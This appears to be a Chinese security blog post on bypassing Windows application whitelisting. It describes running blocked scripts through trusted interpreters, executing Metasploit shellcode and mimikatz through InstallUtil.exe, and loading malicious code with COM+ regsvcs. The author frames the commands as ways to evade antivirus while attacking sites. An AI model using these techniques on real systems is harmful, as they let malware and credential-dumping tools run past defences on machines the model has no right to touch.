Coisini、
Coisini、

利用白名单应用绕过防护


0x00 前言
看了subTee的在ShmooCon2015的PPT,学习到了很多关于应用白名单绕过的技巧,今天又看见了subTee开始写博客了,并且详细解释了关于应用白名单绕过的方法,于是结合自己测试与大家分享一下。

看完ppt其实作者是想告诉我们一种思想,我自己的理解是“利用信任程序执行恶意代码“。

0x01 脚本执行
当在一些情况下,比如限制了.bat|.vbs|.ps1脚本执行,我们可以通过以下方法绕过

.bat                 cmd.exe /k < script.txt 
.vbs                cscript.exe //E:vbscript script.txt  
.ps1                Get-Content script.txt | iex




测试的时候请注意编码这个坑,如果你自己新建一个文件手动写“net
user”到文件测试,你会发现不成功,所以请用echo。

0x01 利用InstallUtil.exe执行程序
有些时候搞站遇到不能执行exe,或者是杀毒软件太厉害,这个方法很好的绕过了检测。当然环境种必须是.net4.0以上。

1.直接用msf生成shellcode,执行shellcode

Step One:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
Step Two:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

然了,如果你想第一步自己本地搞定,然后第二部再上传服务器执行也行。

2.直接执行pe文件(执行mimikatz)

如果是pe文件,需要先把pe文件base64编码,有两种方法:

* Base64 Encode Mimikatz In PowerShell-
$fileName = "mimikatz.exe"
$fileContent = get-content $fileName
$fileContentBytes = [System.Text.Encoding]::UTF8.GetBytes($fileContent)
$fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes)
$fileContentEncoded | set-content ($fileName + ".b64")
* [OR]
byte[] AsBytes = File.ReadAllBytes(@"C:\Tools\Mimikatz.exe");
String AsBase64String = Convert.ToBase64String(AsBytes);
StreamWriter sw = new StreamWriter(@"C:\Tools\Mimikatz.b64");
sw.Write(AsBase64String);
sw.Close();

利用同上:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe


0x02 利用COM+应用
把我们的恶意shellcode写入COM+应用中

1: [.NET SDK]  sn.exe key.snk
2: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /keyfile:key.snk /target:library /out:dllguest.dll dllguest.cs
3: [As Administrator] C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe dllguest.dll
4: [From PowerShell]$b = New-Object -ComObject dllguest.bypass
         OR
   [From VBScript]Dim obj Set obj = CreateObject("dllguest.Bypass")

使用原作的demo:

虽然demo写的不是很完美,测试的时候出了很多错,但已经能够表明作者“利用白名单应用执行恶意代码”的目的。

你可能感兴趣的:(安全开发,逆向漏洞,实战篇)

  • 入门网络安全工程师要学习哪些内容 白帽黑客2659 web安全学习安全网安入门网络安全
    大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对网络安全工程师还是不了解,不知道网络安全工程师需要学什么?知了堂小编总结出以下要点。网络安全工程师是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和渗透测试工程师不一样,如果你想成为安全开发工程师,学的侧重点就和安全运维工程师不一样。网络安全工程师学的东
  • 入门网络安全工程师要学习哪些内容 白帽黑客2659 web安全学习安全网安入门网络安全
    大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对网络安全工程师还是不了解,不知道网络安全工程师需要学什么?知了堂小编总结出以下要点。网络安全工程师是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和渗透测试工程师不一样,如果你想成为安全开发工程师,学的侧重点就和安全运维工程师不一样。网络安全工程师学的东
  • 鸿蒙HarmonyOS应用开发之使用Node-API接口进行线程安全开发 OpenHarmony_小贾 移动开发HarmonyOSOpenHarmonyharmonyos安全华为移动开发物联网APP
    场景介绍napi_create_threadsafe_function是Node-API接口之一,用于创建一个线程安全的JavaScript函数。主要用于在多个线程之间共享和调用,而不会出现竞争条件或死锁。例如以下场景:异步计算:如果需要进行耗时的计算或IO操作,可以创建一个线程安全的函数,将计算或IO操作放在另一个线程中执行,避免阻塞主线程,提高程序的响应速度。数据共享:如果多个线程需要访问同一
  • 2024年最全API成批分配漏洞介绍与解决方案_api 成批分配,聊聊网络安全开发的现状和思考 2401_84132544 程序员web安全网络安全
    本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有
  • AI大模型探索之路-实战篇9:探究Agent智能数据分析平台的架构与功能 寻道AI小兵 AI大模型Agent探索实践人工智能AIGC语言模型AI编程自然语言处理Agent数据分析
    系列篇章AI大模型探索之路-实战篇4:深入DB-GPT数据应用开发框架调研AI大模型探索之路-实战篇5:探索OpenInterpreter开放代码解释器调研AI大模型探索之路-实战篇6:掌握FunctionCalling的详细流程AI大模型探索之路-实战篇7:FunctionCalling技术实战自动生成函数AI大模型探索之路-实战篇8:多轮对话与FunctionCalling技术应用目录系列篇章
  • 2024年网络安全最全二蛋赠书二十期:《Python数据分析》,阿里架构师深入讲解网络安全开发 2401_84264583 程序员web安全python数据分析
    网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化资料的朋友,可以点击这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!总之,对于Python的学习和掌握为开发者提供了一个
  • 【大模型实战篇】大模型周边NLP技术回顾及预训练模型数据预处理过程解析(预告) 源泉的小广场 大模型自然语言处理人工智能大模型LLM预训练模型数据预处理高质量数据
    1.背景介绍进入到大模型时代,似乎宣告了与过去自然语言处理技术的结束,但其实这两者并不矛盾。大模型时代,原有的自然语言处理技术,依然可以在大模型的诸多场景中应用,特别是对数据的预处理阶段。本篇主要关注TextCNN、FastText和Word2Vec等低成本的自然语言处理技术,如何在大模型时代发挥其余热。今天先抛出这个主题预告,接下来会花些时间,逐步细化分析这些周边技术的算法原理、数学分析以及大模
  • ndk开发教程,Android-Binder机制及AIDL使用,实战篇 clhcowboy 程序员android
    开头1、一定要把基本的数据结构,经典的算法,Unix编程,程序编译链接及计算机原理等基础知识扎牢,这些会长远影响你的职业发展。2、推荐从C语言入门,不单是因为很多操作系统、网络协议栈开源代码由C/C++实现,更多是因为C语言自身的特性:作为高级语言用户无需关注底层细节,同时能直观的看到数据流向。而且C相对语法规则较为简单,可以短时间的上手应用。最重要的是,遵循C/C++、python的学习方式,比
  • 【实战篇】Mcu配置 李白LeeBai AUTOSAR学习笔记单片机嵌入式硬件mcu汽车学习笔记
    目录1前言2步骤2.1General配置2.2时钟源配置2.3新建时钟参考2.4配置时钟参考2.6结果展示3总结1前言本章我们开始配置Mcu模块,Mcu的配置项非常多,为最简化完成CAN的配置,我们需要按照【实战篇】新建EB工程的方法和步骤完成工程创建。本文中,我们将重点放在CAN的时钟配置上。时钟的配置,需要我们准备好芯片数据手册进行查询,这里以英飞凌TC397芯片为例,我们需要下载如下两份手册
  • 基于DDD的微服务设计和开发实战 九龙冰室083 设计模式微服务javamicroservices
    本文已在InfoQ发表。你是否还在为微服务应该拆多小而争论不休?到底如何才能设计出收放自如的微服务?怎样才能保证业务领域模型与代码模型的一致性?或许本文能帮你找到答案。本文是基于DDD的微服务设计和开发实战篇,通过借鉴领域驱动设计思想,指导微服务项目团队进行设计和开发(理论篇详见《当中台遇上DDD,我们该如何设计微服务》)。本文包括三部分内容:第一部分讲述领域驱动设计基本知识,包括:分层架构、服务
  • Java开发从入门到精通(七):Java的面向对象编程OOP:常用API HACKNOE Java开发从入门到精通javaintellij-idea
    Java大数据开发和安全开发(一)Java的常用API1.1Object类1.1toString1.1equals方法1.1对象克隆clone1.1Objects类1.1包装类1.1StringBuilder1.1StringBuffer1.1StringJoiner1.1Math、System、Runtime1.1BigDecimal1.1传统时间:Date日期类、SimpleDateForma
  • 读书——财务自由之路II 弥志伟
    沿着《小狗钱钱》的足迹,我找到了作者博多·舍费尔写给成人的理财书——《财务自由之路》(I,II,III),因为第二本是进阶实战篇,所以我选择先从第二本读起。作者先是告诉我们两个消息,好消息是:赚钱是一项游戏,你可以在不延长工作时间,也不提高工作强度的情况下,12个月内多赚20%,并且在三年内将总收入翻一番。但坏消息是,大部分人并不了解游戏规则。要想学习新的游戏规则,首先我们要看清我们思维中的老规则
  • 039-安全开发-JavaEE应用&SpringBoot框架&Actuator监控泄漏&Swagger自动化 wusuowei2986 安全java-eespringboot
    039-安全开发-JavaEE应用&SpringBoot框架&Actuator监控泄漏&Swagger自动化#知识点:1、JavaEE-SpringBoot-监控系统-Actuator2、JavaEE-SpringBoot-接口系统-Swagger3、JavaEE-SpringBoot-监控&接口&安全问题演示案例:➢SpringBoot-监控系统-Actuator➢SpringBoot-接口系统
  • 040-安全开发-JavaEE应用&SpringBoot框架&JWT身份鉴权&打包部署JAR&WAR wusuowei2986 安全java-eespringboot
    040-安全开发-JavaEE应用&SpringBoot框架&JWT身份鉴权&打包部署JAR&WAR#知识点:1、JavaEE-SpringBoot-身份鉴权-JWT技术2、JavaEE-SpringBoot-打包部署-JAR&WAR演示案例:➢SpringBoot-身份鉴权-JWT技术➢SpringBoot-打包部署-JAR&WAR#SpringBoot-身份鉴权-JWT技术JWT(JSONWe
  • 035-安全开发-JavaEE应用&原生反序列化&重写方法&链条分析&触发类&类加载 wusuowei2986 安全java-eepython
    035-安全开发-JavaEE应用&原生反序列化&重写方法&链条分析&触发类&类加载#知识点:1、JavaEE-反序列化-解释&使用&安全2、JavaEE-安全-利用链&直接重写方法3、JavaEE-安全-利用链&外部重写方法演示案例:➢Java-原生使用-序列化&反序列化➢Java-安全问题-重写方法&触发方法➢Java-安全问题-可控其他类重写方法#Java序列化&反序列化-概念1、序列化与反
  • 033-安全开发-JavaEE应用&SQL预编译&Filter过滤器&Listener监听器&访问控制 wusuowei2986 安全java-eesql
    033-安全开发-JavaEE应用&SQL预编译&Filter过滤器&Listener监听器&访问控制#知识点:1、JavaEE-JDBC-SQL预编译2、JavaEE-HTTP-Filter过滤器3、JavaEE-对象域-Listen监听器演示案例:➢JavaEE-预编译-SQL➢JavaEE-过滤器-Filter➢JavaEE-监听器-Listen#JavaEE-预编译-SQL原理:提前编译好
  • 036-安全开发-JavaEE应用&第三方组件&Log4j日志&FastJson序列化&JNDI注入 wusuowei2986 安全java-eelog4j
    036-安全开发-JavaEE应用&第三方组件&Log4j日志&FastJson序列化&JNDI注入#知识点:1、JavaEE-组件安全-Log4j2、JavaEE-组件安全-Fastjson3、JavaEE-基本了解-JNDI-API演示案例:➢Java-三方组件-Log4J&JNDI➢Java-三方组件-FastJson&反射#Java-项目管理工具-配置Jar仓库:https://mvnre
  • Pandas数据库大揭秘:read_sql、to_sql 参数详解与实战篇【第81篇—Pandas数据库】 一见已难忘的申公豹 数据库pandassqlpython数据存储数据科学
    Pandas数据库大揭秘:read_sql、to_sql参数详解与实战篇Pandas是Python中一流的数据处理库,而数据库则是数据存储和管理的核心。将两者结合使用,可以方便地实现数据的导入、导出和分析。本文将深入探讨Pandas中用于与数据库交互的两个关键方法:read_sql和to_sql。通过详细解析这两个方法的参数,我们将为读写数据库提供清晰的指导,并附带实际代码演示,以帮助读者更好地理
  • STM32玩转物联网实战篇:3.1.ESP8266 WIFI模块WEBClient通信示例详解GET、POST(心知天气、Onenet) AIoT-韶华分明 STM32玩转物联网实战篇stm32单片机嵌入式物联网网络通信
    1、准备开发板开发板功能区分布图开发板俯视图2、HTTP协议介绍HTTP协议简介    HTTP(HyperTextTransferProtocol)协议,即超文本传输协议,是一种用于分布式、协作式和超媒体信息系统的应用层协议。HTTP协议是基于TCP/IP协议的网络应用层协议。    HTTP是一个客户端终端(用户)和服务器端(网站)请求和应答的标准(TCP)。通过使用网页浏览器、网络爬虫或者其
  • Jmeter接口测试实战篇:10分钟学会Jmeter的用法 .咖啡加剁椒. 软件测试jmeter软件测试自动化测试功能测试程序人生职场和发展
    一提到接口测试,通常大家会有这样的疑问:前端测试不是已经覆盖到各种业务逻辑了吗?为什么还要做接口测试,接口测试和前端测试是不是重复了?对于这个问题,可以从下面几个方面来解释:什么是接口测试?接口测试是测试系统组件间接口的一种测试。接口测试主要用于检测外部系统与系统之间以及内部各个子系统之间的交互点。测试的重点是要检查数据的交换,传递和控制管理过程,以及系统间的相互逻辑依赖关系等。为什么要做接口测试
  • 理财小白实战篇【1】 20.2.21 ChenZi1892
    2020定个小目标先挣个2W[本金5000]看了很多博主的文章说养成理财的习惯就能使得财富,而我觉得理财是一门很大的学问,需要终身学习和总结实战首先提醒一下各位理财是使得自己的富余财富增长的过程,要有只要是投资就有风险的意识。最佳的理财形势是留足日常所需的现金。最好不要贷款投资,这样会让你压力增大,投资判断失误,影响生活质量。小编将关注并从事基金,黄金,股票,虚拟币的投资,希望和大家一起学习,共同
  • 每日安全资讯(2018.7.20) 溪边的墓志铭
    我们在安全开发的哪个位置?BSIMM来告诉你在企业向安全软件开发周期转型的过程中,不仅仅需要指导性的模型来确保自己的目标,也需要BSIMM这样的描述性模型去确认自己在安全中的方位以及自己前进的方向是否正确。https://www.secrss.com/articles/4031Gartner:对待中国《网络安全法》的四个步骤Gartner预测,到2021年,80%在中国运营的企业机构将会与咨询公司
  • 软件安全开发 星环之光 网络安全软件工程
    本文已收录至《全国计算机等级考试——信息安全技术》专栏1.1软件安全开发背景1.1.1软件的发展和安全问题软件是指计算机程序、方法和相关的文档资料,以及在计算机上运行时所需要的数据。软件安全问题有以下几个方面:(1)系统软件安全问题(2)应用软件安全问题(3)第三方代码安全(4)新技术安全问题软件的安全问题一般包含两个方面:一是软件的可靠性和可用性问题;二是软件中信息的保密性和完整性问题。1.1.
  • 2019-10-21 丛培国
    图片发自App【精进打卡第646天】【知~学习】《六项精进》0遍共61遍《大学》0遍共60遍【今年计划读十五本书】一、《正念领导力》OK二、《马云内部讲话》102三、《毛泽东》罗斯·特里尔OK四、《卓越企业的经营手法》OK五、《公司开了,你该这样管理》OK六、《我的第一本思维导图》015七、《阿米巴经营.实战篇》OK八、《稻盛哲学与阳明心学》OK九、《成功的真谛》OK十、《老板财务管控必修课》OK
  • 2020-12-22 阿戴儿_f4c0
    游戏力养育实战篇一‌早上起床的时候现在天气比较冷,我们怎么叫孩子起床的呢?孩子在被窝里磨蹭不肯起床,你是否总喊:快点儿快点儿,要迟到啦,来不及啦,但是你发现躺着还是一动不动,而且你越喊他越磨蹭。然后父母就更着急了,开始吼起来,结果呢?可想而知,孩子不高兴不配合我们自己心情也不好了!‌我们试着换种方法,宝宝,听说你自己会穿衣服裤子和袜子了,对吧!那我想知道你穿完一整套,需要多少时间!妈妈给你计时,好
  • 重要的事情,虽然不着急,也要马上处理。否则随时都会变成重要紧急的事情,而且会比当初更加的棘手 丛培国
    姓名:丛培国机构:丛迪服装公司【日精进打卡第253天】【知~学习】《六项精进》0遍共61遍《大学》0遍共60遍今年计划十五本一、《活法》OK二、《OKR工作法》二遍OK三、《创造高收益.贰》OK四、《思维导图.记忆力与专注力训练》OK五、《经营三十四问》P100六、《经营十二条》OK七、《调动员工积极性的七个关键》OK八、《经营与会计》OK九、《心法》二遍29十、《阿米巴经营.实战篇》015十一、
  • 深度学习实战篇之 ( 十八) -- Pytorch之SeNet fengyuxie 深度学习pytorch人工智能python机器学习
    科普知识注意力机制(AttentionMechanism)源于对人类视觉的研究。在认知科学中,由于信息处理的瓶颈,人类会选择性地关注所有信息的一部分,同时忽略其他可见的信息。上述机制通常被称为注意力机制。人类视网膜不同的部位具有不同程度的信息处理能力,即敏锐度(Acuity),只有视网膜中央凹部位具有最强的敏锐度。为了合理利用有限的视觉信息处理资源,人类需要选择视觉区域中的特定部分,然后集中关注它
  • Python 散点图线性拟合_线性回归(实战) weixin_39929595 Python散点图线性拟合python线性回归统计检验p值线性回归系数的标准误
    前面介绍了线性回归的理论知识后,有些朋友建议我写一篇实战篇,这样可以方便理解。今天我们就来使用Python实现多元线性回归模型的落地。本次数据集如下链接:https://pan.baidu.com/s/16w8-snxnTKtU3boAJGN1Cgpan.baidu.com提取码:3udf各个变量解释为AT:温度V:压力AP:相对湿度RH:排气量PE:发电量(因变量)下面正式开始吧!1,导入包#导
  • Kubernetes系列之监控Metres-server实战篇 weixin_30843605 json5ggit
    本次系列使用的所需部署包版本都使用的目前最新的或最新稳定版,安装包地址请到公众号内回复【K8s实战】获取介绍从Kubernetes1.8开始,Kubernetes通过MetricsAPI获取资源使用指标,例如容器CPU和内存使用情况。这些度量指标可以由用户直接访问,例如通过使用kubectltop命令,或者使用集群中的控制器。MetricsAPI:通过MetricsAPI,您可以获得node或po
  • Java安全开发 文景大大
    一、数据校验数据校验一般分为两种思路:黑名单剔除或者替换某些危险的字符,但是这种方案是比较弱的校验,因为你永远想不到会有其它什么危险的字符不在黑名单之内;白名单限定只能输入合法的字符,安全性高,但是白名单可能会维护较多的内容;1.1SQL注入避免直接使用不可信的数据来拼接需要执行的SQL语句,这是为了防止原始的SQL被意外地篡改为与预期完全不同语句。通常有以下两种解决方法:使用参数化查询;参数化查
  • jvm调优总结(从基本概念 到 深度优化) oloz javajvmjdk虚拟机应用服务器
    JVM参数详解:http://www.cnblogs.com/redcreen/archive/2011/05/04/2037057.html   Java虚拟机中,数据类型可以分为两类:基本类型和引用类型。基本类型的变量保存原始值,即:他代表的值就是数值本身;而引用类型的变量保存引用值。“引用值”代表了某个对象的引用,而不是对象本身,对象本身存放在这个引用值所表示的地址的位置。
  • 【Scala十六】Scala核心十:柯里化函数 bit1129 scala
    本篇文章重点说明什么是函数柯里化,这个语法现象的背后动机是什么,有什么样的应用场景,以及与部分应用函数(Partial Applied Function)之间的联系   1. 什么是柯里化函数 A way to write functions with multiple parameter lists. For instance def f(x: Int)(y: Int) is a
  • HashMap dalan_123 java
    HashMap在java中对很多人来说都是熟的;基于hash表的map接口的非同步实现。允许使用null和null键;同时不能保证元素的顺序;也就是从来都不保证其中的元素的顺序恒久不变。 1、数据结构     在java中,最基本的数据结构无外乎:数组 和 引用(指针),所有的数据结构都可以用这两个来构造,HashMap也不例外,归根到底HashMap就是一个链表散列的数据
  • Java Swing如何实时刷新JTextArea,以显示刚才加append的内容 周凡杨 java更新swingJTextArea
    在代码中执行完textArea.append("message")后,如果你想让这个更新立刻显示在界面上而不是等swing的主线程返回后刷新,我们一般会在该语句后调用textArea.invalidate()和textArea.repaint()。 问题是这个方法并不能有任何效果,textArea的内容没有任何变化,这或许是swing的一个bug,有一个笨拙的办法可以实现
  • servlet或struts的Action处理ajax请求 g21121 servlet
    其实处理ajax的请求非常简单,直接看代码就行了: //如果用的是struts //HttpServletResponse response = ServletActionContext.getResponse(); // 设置输出为文字流 response.setContentType("text/plain"); // 设置字符集 res
  • FineReport的公式编辑框的语法简介 老A不折腾 finereport公式总结
    FINEREPORT用到公式的地方非常多,单元格(以=开头的便被解析为公式),条件显示,数据字典,报表填报属性值定义,图表标题,轴定义,页眉页脚,甚至单元格的其他属性中的鼠标悬浮提示内容都可以写公式。 简单的说下自己感觉的公式要注意的几个地方:   1.if语句语法刚接触感觉比较奇怪,if(条件式子,值1,值2),if可以嵌套,if(条件式子1,值1,if(条件式子2,值2,值3)
  • linux mysql 数据库乱码的解决办法 墙头上一根草 linuxmysql数据库乱码
    linux 上mysql数据库区分大小写的配置 lower_case_table_names=1 1-不区分大小写 0-区分大小写   修改/etc/my.cnf 具体的修改内容如下:   [client] default-character-set=utf8   [mysqld] datadir=/var/lib/mysql socket=/va
  • 我的spring学习笔记6-ApplicationContext实例化的参数兼容思想 aijuans Spring 3
    ApplicationContext能读取多个Bean定义文件,方法是: ApplicationContext appContext = new ClassPathXmlApplicationContext( new String[]{“bean-config1.xml”,“bean-config2.xml”,“bean-config3.xml”,“bean-config4.xml
  • mysql 基准测试之sysbench annan211 基准测试mysql基准测试MySQL测试sysbench
    1 执行如下命令,安装sysbench-0.5: tar xzvf sysbench-0.5.tar.gz  cd sysbench-0.5  chmod +x autogen.sh  ./autogen.sh  ./configure --with-mysql --with-mysql-includes=/usr/local/mysql
  • sql的复杂查询使用案列与技巧 百合不是茶 oraclesql函数数据分页合并查询
      本片博客使用的数据库表是oracle中的scott用户表;          -------------------  自然连接查询           查询 smith 的上司(两种方法) &
  • 深入学习Thread类 bijian1013 javathread多线程java多线程
    一.             线程的名字 下面来看一下Thread类的name属性,它的类型是String。它其实就是线程的名字。在Thread类中,有String getName()和void setName(String)两个方法用来设置和获取这个属性的值。 同时,Thr
  • JSON串转换成Map以及如何转换到对应的数据类型 bijian1013 javafastjsonnet.sf.json
            在实际开发中,难免会碰到JSON串转换成Map的情况,下面来看看这方面的实例。另外,由于fastjson只支持JDK1.5及以上版本,因此在JDK1.4的项目中可以采用net.sf.json来处理。 一.fastjson实例 JsonUtil.java package com.study; impor
  • 【RPC框架HttpInvoker一】HttpInvoker:Spring自带RPC框架 bit1129 spring
    HttpInvoker是Spring原生的RPC调用框架,HttpInvoker同Burlap和Hessian一样,提供了一致的服务Exporter以及客户端的服务代理工厂Bean,这篇文章主要是复制粘贴了Hessian与Spring集成一文,【RPC框架Hessian四】Hessian与Spring集成   在 【RPC框架Hessian二】Hessian 对象序列化和反序列化一文中
  • 【Mahout二】基于Mahout CBayes算法的20newsgroup的脚本分析 bit1129 Mahout
    #!/bin/bash # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information re
  • nginx三种获取用户真实ip的方法 ronin47
    随着nginx的迅速崛起,越来越多公司将apache更换成nginx. 同时也越来越多人使用nginx作为负载均衡, 并且代理前面可能还加上了CDN加速,但是随之也遇到一个问题:nginx如何获取用户的真实IP地址,如果后端是apache,请跳转到<apache获取用户真实IP地址>,如果是后端真实服务器是nginx,那么继续往下看。 实例环境: 用户IP 120.22.11.11
  • java-判断二叉树是不是平衡 bylijinnan java
    参考了 http://zhedahht.blog.163.com/blog/static/25411174201142733927831/ 但是用java来实现有一个问题。 由于Java无法像C那样“传递参数的地址,函数返回时能得到参数的值”,唯有新建一个辅助类:AuxClass import ljn.help.*; public class BalancedBTree {
  • BeanUtils.copyProperties VS PropertyUtils.copyProperties 诸葛不亮 PropertyUtilsBeanUtils
     BeanUtils.copyProperties VS  PropertyUtils.copyProperties  作为两个bean属性copy的工具类,他们被广泛使用,同时也很容易误用,给人造成困然;比如:昨天发现同事在使用BeanUtils.copyProperties copy有integer类型属性的bean时,没有考虑到会将null转换为0,而后面的业
  • [金融与信息安全]最简单的数据结构最安全 comsci 数据结构
          现在最流行的数据库的数据存储文件都具有复杂的文件头格式,用操作系统的记事本软件是无法正常浏览的,这样的情况会有什么问题呢?        从信息安全的角度来看,如果我们数据库系统仅仅把这种格式的数据文件做异地备份,如果相同版本的所有数据库管理系统都同时被攻击,那么
  • vi区段删除 Cwind linuxvi区段删除
    区段删除是编辑和分析一些冗长的配置文件或日志文件时比较常用的操作。简记下vi区段删除要点备忘。   vi概述    引文中并未将末行模式单独列为一种模式。单不单列并不重要,能区分命令模式与末行模式即可。   vi区段删除步骤: 1. 在末行模式下使用:set nu显示行号 非必须,随光标移动vi右下角也会显示行号,能够正确找到并记录删除开始行
  • 清除tomcat缓存的方法总结 dashuaifu tomcat缓存
    用tomcat容器,大家可能会发现这样的问题,修改jsp文件后,但用IE打开 依然是以前的Jsp的页面。 出现这种现象的原因主要是tomcat缓存的原因。 解决办法如下: 在jsp文件头加上 <meta http-equiv="Expires" content="0"> <meta http-equiv="kiben&qu
  • 不要盲目的在项目中使用LESS CSS dcj3sjt126com Webless
     如果你还不知道LESS CSS是什么东西,可以看一下这篇文章,是我一朋友写给新人看的《CSS——LESS》   不可否认,LESS CSS是个强大的工具,它弥补了css没有变量、无法运算等一些“先天缺陷”,但它似乎给我一种错觉,就是为了功能而实现功能。   比如它的引用功能 ? .rounded_corners{     
  • [入门]更上一层楼 dcj3sjt126com PHPyii2
    更上一层楼 通篇阅读完整个“入门”部分,你就完成了一个完整 Yii 应用的创建。在此过程中你学到了如何实现一些常用功能,例如通过 HTML 表单从用户那获取数据,从数据库中获取数据并以分页形式显示。你还学到了如何通过 Gii 去自动生成代码。使用 Gii 生成代码把 Web 开发中多数繁杂的过程转化为仅仅填写几个表单就行。 本章将介绍一些有助于更好使用 Yii 的资源:
  • Apache HttpClient使用详解 eksliang httpclienthttp协议
    Http协议的重要性相信不用我多说了,HttpClient相比传统JDK自带的URLConnection,增加了易用性和灵活性(具体区别,日后我们再讨论),它不仅是客户端发送Http请求变得容易,而且也方便了开发人员测试接口(基于Http协议的),即提高了开发的效率,也方便提高代码的健壮性。因此熟练掌握HttpClient是很重要的必修内容,掌握HttpClient后,相信对于Http协议的了解会
  • zxing二维码扫描功能 gundumw100 androidzxing
    经常要用到二维码扫描功能 现给出示例代码 import com.google.zxing.WriterException; import com.zxing.activity.CaptureActivity; import com.zxing.encoding.EncodingHandler; import android.app.Activity; import an
  • 纯HTML+CSS带说明的黄色导航菜单 ini htmlWebhtml5csshovertree
    HoverTree带说明的CSS菜单:纯HTML+CSS结构链接带说明的黄色导航   在线体验效果:http://hovertree.com/texiao/css/1.htm代码如下,保存到HTML文件可以看到效果:   <!DOCTYPE html > <html > <head> <title>HoverTree
  • fastjson初始化对性能的影响 kane_xie fastjson序列化
    之前在项目中序列化是用thrift,性能一般,而且需要用编译器生成新的类,在序列化和反序列化的时候感觉很繁琐,因此想转到json阵营。对比了jackson,gson等框架之后,决定用fastjson,为什么呢,因为看名字感觉很快。。。   网上的说法:   fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发。
  • 基于Mybatis封装的增删改查实现通用自动化sql mengqingyu DAO
    1.基于map或javaBean的增删改查可实现不写dao接口和实现类以及xml,有效的提高开发速度。 2.支持自定义注解包括主键生成、列重复验证、列名、表名等 3.支持批量插入、批量更新、批量删除 <bean id="dynamicSqlSessionTemplate" class="com.mqy.mybatis.support.Dynamic
  • js控制input输入框的方法封装(数字,中文,字母,浮点数等) qifeifei javascript js
    在项目开发的时候,经常有一些输入框,控制输入的格式,而不是等输入好了再去检查格式,格式错了就报错,体验不好。 /** 数字,中文,字母,浮点数(+/-/.) 类型输入限制,只要在input标签上加上 jInput="number,chinese,alphabet,floating" 备注:floating属性只能单独用*/     funct
  • java 计时器应用 tangqi609567707 javatimer
    mport java.util.TimerTask;   import java.util.Calendar;   public class MyTask extends TimerTask {        private static final int
  • erlang输出调用栈信息 wudixiaotie erlang
    在erlang otp的开发中,如果调用第三方的应用,会有有些错误会不打印栈信息,因为有可能第三方应用会catch然后输出自己的错误信息,所以对排查bug有很大的阻碍,这样就要求我们自己打印调用的栈信息。用这个函数:erlang:process_display (self (), backtrace).需要注意这个函数只会输出到标准错误输出。 也可以用这个函数:erlang:get_s
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他